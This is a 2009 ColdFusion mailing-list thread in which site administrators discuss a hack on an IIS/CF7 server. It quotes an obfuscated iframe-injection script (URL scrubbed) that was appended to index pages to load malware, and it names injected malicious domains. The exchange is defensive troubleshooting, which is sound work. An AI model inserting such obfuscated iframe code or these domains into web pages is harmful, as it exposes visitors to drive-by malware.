It's an iframe injection hack. It will insert a hidden frame into any index.* page it finds. Some urls entries inserted are 'goooogleleadsense.biz/?click=*****', 'mediahousenameshopfilm.cn/in.cgi?income29' Change FTP passwords...
-----Original Message----- From: Nick Gleason [mailto:n.glea...@citysoft.com] Sent: Monday, April 06, 2009 4:28 PM To: cf-talk Subject: RE: Question about hack William, That's a great post - we're re-reading it now. However, this situation seems to be code in the index.cfm page, not something being appended from the db. So, I'm not sure if that post will be relevant in this case. Thoughts? N > -----Original Message----- > From: William [mailto:will...@seiter.com] > Sent: Monday, April 06, 2009 3:50 PM > To: cf-talk > Subject: RE: Question about hack > > > Do a search on this list for 'exec(' > There was a big todo about this last summer. Probably in > your database > > > > -----Original Message----- > From: Nick Gleason <n.glea...@citysoft.com> > Sent: Monday, April 06, 2009 2:19 PM > To: cf-talk <cf-talk@houseoffusion.com> > Subject: Question about hack > > > Hi there. We've just seen a hack attempt that we haven't > seen before and I wanted to get feedback. > > The symptom is that some script code is inserted at the > bottom of certain pages (e.g. index.cfm). The script (which > has been scrubbed) looks like > this: > <script><!-- > var applstrna0 = "<if"; > var applstrna1 = "rame src=http://said7";; > var applstrna2 = ".[BAD URL HERE]"; > var applstrna3 = " width=100 height=0></i"; > var applstrna4 = "frame>"; > document.write(applstrna0+applstrna1+applstrna2+applstrna3+app > lstrna4); > //--></script> > > The script downloads malware, which we obviously want to > prevent. We're trying to determine how it's getting in > their, whether through an old site with inadequate code or > the OS or something else. Any thoughts? > > This is on a server running IIS 6 / CF7. > > Thanks in advance, > > Nick > > > > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321369 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
